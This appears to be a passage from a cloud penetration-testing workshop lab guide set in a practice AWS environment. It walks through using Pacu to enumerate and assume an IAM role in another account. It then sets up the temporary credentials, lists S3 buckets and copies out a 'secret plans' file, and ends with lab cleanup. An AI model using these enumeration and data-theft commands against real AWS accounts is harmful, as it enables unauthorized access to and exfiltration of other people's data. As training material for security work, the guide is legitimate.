cd /root/pacu
Danger
If you do not see (venv) in your prompt, run the following command:
source venv/bin/activate
Next, type the command to get pacu working.
Command Lines
python3 cli.py
Since you already have an existing pacu session, go in and make sure you can use it again by typing 1.
Command Lines
1
Example Output
(venv) root@588ace135fab:~/pacu# cd /root/pacu (venv) root@588ace135fab:~/pacu# python3 cli.py ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀ ⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧ ⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ ⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟ ⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁ ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀ ⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀ ⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿ ⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟ ⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀ Version: 1.5.3 Found existing sessions: [0] New session [1] aviata Choose an option: 1
-
Now that you are in pacu, let's run the AssumeRole targeting module, specifying the following values:
- The account number of aviata.
- The wordlist we created in the previous step.
Command Lines
run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8
Example Output
Pacu (aviata:imported-default) > run iam__enum_roles --word-list /root/workdir/wordlist.txt --account-id 97[EXAMPLE]8 Running module iam__enum_roles... [iam__enum_roles] Warning: This script does not check if the keys you supplied have the correct permissions. Make sure they are allowed to use iam:UpdateAssumeRolePolicy on the role that you pass into --role-name and are allowed to use sts:AssumeRole to try and assume any enumerated roles! [iam__enum_roles] Targeting account ID: 97[EXAMPLE]8 [iam__enum_roles] Starting role enumeration... [iam__enum_roles] Found role: arn:aws:iam::97[EXAMPLE]8:role/aviata [iam__enum_roles] Found 1 role(s): [iam__enum_roles] arn:aws:iam::97[EXAMPLE]8:role/aviata [iam__enum_roles] Checking to see if any of these roles can be assumed for temporary credentials... [iam__enum_roles] Role can be assumed, but hit max session time limit, reverting to minimum of 1 hour... [iam__enum_roles] Successfully assumed role for 1 hour: arn:aws:iam::97[EXAMPLE]8:role/aviata [iam__enum_roles] { "Credentials": { "AccessKeyId": "ASIA[EXAMPLE]PJ", "SecretAccessKey": "WU3[EXAMPLE]Hlq", "SessionToken": "FwoG[EXAMPLE]A==", "Expiration": "2024-04-13 11:35:10+00:00" }, "AssumedRoleUser": { "AssumedRoleId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk", "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk" } } Cleaning up the PacuIamEnumRoles-w8Zxb role. ..Pacu (aviata:imported-default) >
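Under the hood, this style of enumeration abuses the fact that IAM validates principals in trust policies: as the module warning above hints, Pacu creates a temporary role in YOUR account (the PacuIamEnumRoles-* role it cleans up at the end) and calls iam:UpdateAssumeRolePolicy with each candidate principal from the wordlist; an update that succeeds means the principal exists, while a malformed-policy error means it does not. It then tries sts:AssumeRole against any roles it found. A manual sketch of a single probe, with an illustrative role name, would be roughly:
aws iam update-assume-role-policy --role-name PacuIamEnumRoles-xxxxx \
  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::97[EXAMPLE]8:role/aviata"},"Action":"sts:AssumeRole"}]}'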
-
What did pacu do? It generated an ASIA key (a temporary access key) in the AWS environment. Now that we have found a role and generated temporary AWS credentials for it, let's use them.
Command Lines
exit
Command Lines
aws configure --profile aviata
You'll be prompted to supply the AWS Access Key ID and AWS Secret Access Key generated by pacu.
Command Lines
aws configure --profile aviata set aws_session_token Fw[EXAMPLE]UGA==
Command Lines
aws sts get-caller-identity --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws configure --profile aviata
AWS Access Key ID [None]: ASIA[EXAMPLE]PJ
AWS Secret Access Key [None]: WU3[EXAMPLE]Hlq
Default region name [us-east-2]:
Default output format [None]:
(venv) root@588ace135fab:~/pacu# aws configure --profile aviata set aws_session_token FwoG[EXAMPLE]A==
(venv) root@588ace135fab:~/pacu# aws sts get-caller-identity --profile aviata
{
    "UserId": "AROA[EXAMPLE]HBQY:8Er[EXAMPLE]XkeYk",
    "Account": "97[EXAMPLE]8",
    "Arn": "arn:aws:sts::97[EXAMPLE]8:assumed-role/aviata/8Err[EXAMPLE]eYk"
}
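If you prefer not to write the temporary credentials into a profile, an equivalent approach is to export them as environment variables for the current shell; the values below are the placeholders from the Pacu output.
Command Lines
export AWS_ACCESS_KEY_ID=ASIA[EXAMPLE]PJ
export AWS_SECRET_ACCESS_KEY=WU3[EXAMPLE]Hlq
export AWS_SESSION_TOKEN=FwoG[EXAMPLE]A==
aws sts get-caller-identity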
-
We now have a role and an identity inside the system. The biggest problem you will have in a penetration test like this is figuring out what permissions you may or may not have. In SEC588 we cover many strategies for this, but due to time constraints in the workshop, we will provide you with a path to victory here.
Let's look at AWS S3 Buckets.
Command Lines
aws s3 ls --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws s3 ls --profile aviata
2024-04-12 09:01:44 aviata-tlpred
2024-03-01 12:18:08 cc2024aviatacloud
2024-04-12 16:52:56 dev.aviata.cloud
-
You can look inside whichever bucket you want within the aviata environment. Only one of the private buckets may be readable. Take a look at the contents of aviata-tlpred.
Command Lines
aws s3 ls s3://aviata-tlpred --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws s3 ls s3://aviata-tlpred --profile aviata
2024-04-12 09:01:43         76 secretplans.txt
-
This sounds enticing. Is it a honeypot? Is it a honeytoken? Is it the real data? We may have to chance it. Steal the data and win the prize?
Command Lines
aws s3 cp s3://aviata-tlpred/secretplans.txt /root/workdir/secretplans.txt --profile aviata
Example Output
(venv) root@588ace135fab:~/pacu# aws s3 cp s3://aviata-tlpred/secretplans.txt /root/workdir/secretplans.txt --profile aviata
download: s3://aviata-tlpred/secretplans.txt to /root/workdir/secretplans.txt
Success! We've acquired Aviata's secret plans. Let's take a look at them.
Command Lines
cat /root/workdir/secretplans.txt
Example Output
[REDACTED] Aviata's secret plans are too sensitive to include in this document.
Cleanup
-
To properly clean up the environment you can use the following commands from within your docker container.
Start by cleaning up manually created resources.
Command Lines
export INSTANCE=$(aws ec2 describe-instances --filters Name=key-name,Values=attacker-key Name=instance-state-name,Values=running \
  --query 'Reservations[].Instances[0].InstanceId' --output text)
echo $INSTANCE
aws ec2 terminate-instances --instance-ids $INSTANCE
aws ec2 delete-snapshot --snapshot-id $SnapshotId
aws ec2 delete-key-pair --key-name attacker-key
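If your container's default region is not us-east-2, add --region us-east-2 to the commands above. Optionally, you can confirm the instance has actually terminated before moving on:
Command Lines
aws ec2 wait instance-terminated --instance-ids $INSTANCE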
-
To clean up your Terraform resources, perform the following steps. First, exit the Docker container. Then move into the terraform folder and destroy the Terraform resources. Finally, remove the Docker images.
Command Lines
exit
Command Lines
cd ../terraform
Command Lines
terraform destroy
Command Lines
docker rmi sec588-workshop-container-tools mosesrenegade/sec588-workshop-container-tools
Conclusion
We hope you enjoyed this taste of what the SEC588 Cloud Penetration Testing course has to offer; it is a multi-faceted look at the world of attacking the cloud. While the course covers AWS, as you saw here, it also covers Microsoft Azure, Entra ID, Microsoft Graph, Kubernetes, Docker, and Cloud Native Applications. Join us in the next chapter of our ACE135 workshop with the class that is the direct opposite of this course, SEC510.